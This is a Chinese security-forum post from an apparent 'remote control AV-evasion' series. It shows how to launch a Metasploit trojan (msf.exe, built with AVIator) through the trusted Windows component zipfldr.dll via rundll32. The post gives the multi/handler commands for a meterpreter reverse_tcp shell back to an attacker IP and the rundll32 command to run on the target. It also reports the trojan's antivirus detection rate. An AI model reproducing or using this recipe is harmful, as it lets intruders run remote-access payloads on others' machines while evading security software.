安全矩阵

 找回密码
 立即注册
搜索
查看: 2952|回复: 0

远控免杀专题(56)-白名单zipfldr.dll执行payload

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-3-27 13:39:33 | 显示全部楼层 |阅读模式
原文链接:远控免杀专题(56)-白名单zipfldr.dll执行payload



一、zipfldr.dll简介
zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。
说明:zipfldr.dll所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。Windows 2003 默认位置:
C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll

win7位置为:
C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll

二、使用zipfldr.dll执行payload
攻击机:10.211.55.10 kali
靶机:10.211.55.18 win7
由AVIator生成msf.exe。具体参考远控免杀专题(14)-AVIator(VT免杀率25/69)
将生成的msf.exe木马移动到靶机上。
metasploit监听
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 10.211.55.10
  4. run
复制代码


靶机执行
  1. rundll32.exe zipfldr.dll,RouteTheCall msf.exe
复制代码


360提示恶意命令执行。点击允许后可上线

放在virustotal.com上msf.exe查杀率为19/69



三、参考资料
基于白名单zipfldr.dll执行payload:https://micro8.github.io/Micro8- ... 85%AB%E5%AD%A3.html





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-2 07:50 , Processed in 0.011150 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表